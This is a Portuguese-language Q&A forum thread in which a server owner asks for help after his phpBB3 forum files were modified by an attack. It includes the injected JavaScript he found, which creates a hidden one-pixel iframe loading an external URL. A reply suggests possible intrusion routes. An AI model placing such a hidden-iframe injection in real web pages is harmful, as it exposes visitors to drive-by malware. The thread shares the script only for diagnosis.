Servidor atacado e não sabe como [duplicado]

1

Possible Duplicates:
My server's been hacked EMERGENCY
Did My Server Get Attacked?

Meu servidor Apache foi atacado e o fórum PHPbb3 instalado tem vários arquivos que foram modificados para exibir um iFrame. O ataque inseriu uma variável e um valor php que depois decodifica para javascript, o qual comanda o cliente a carregar um iFrame com conteúdo externo. Também meu arquivo HEADER.html (cabeçalho para navegação no diretório apache) foi modificado e outros em potencial.

O nome da variável usada no php injetado é "$ somecrainsignvar". Eu encontrei ataques semelhantes online. Eu entendo que talvez o software forumn esteja desatualizado e um possível vazamento de segurança ou talvez outras seções no servidor possam ser vazamentos potenciais, no entanto todo o acesso ao servidor é restrito via htpasswd / htaccess, portanto eu não entendo como os atacantes / bot conseguiram fazer alterações ou até mesmo acessar o site.

Qualquer ajuda seria muito apreciada. também anexado é o código javascript injetado via php.

<script type="text/javascript">document.writeln("<body>");var el = document.createElement("iframe");document.body.appendChild(el);el.id = 'myname';el.name = 'myname';el.style.width = "1px";el.style.height ="1px";el.scrolling="auto";el.frameBorder="0";el.src = "http://farenta.in/gb/us.php";</script>
    
por Maurycy_was_userxxxxxx 02.06.2011 / 19:50

1 resposta

2

Existem outros sites em execução neste servidor? Quais contas têm permissão para gravar nos arquivos do servidor da web? Este é um servidor dedicado ou é compartilhado com outros usuários?

Existem muitas maneiras pelas quais isso poderia ter sido feito, muitas das quais não envolvem o site. Senhas SSH facilmente adivinhadas / brute-forçadas, por exemplo. Analisando alguns dos resultados do Google para pessoas, as pessoas perguntam sobre "$ somecrainsignvar" , não parece específico para phpBB ou wordpress, então é provável que exista uma exploração em seu próprio servidor da Web ou em algum outro serviço em execução no servidor que permita que outras pessoas gravem diretamente nos arquivos.

    
por 02.06.2011 / 20:17

Tags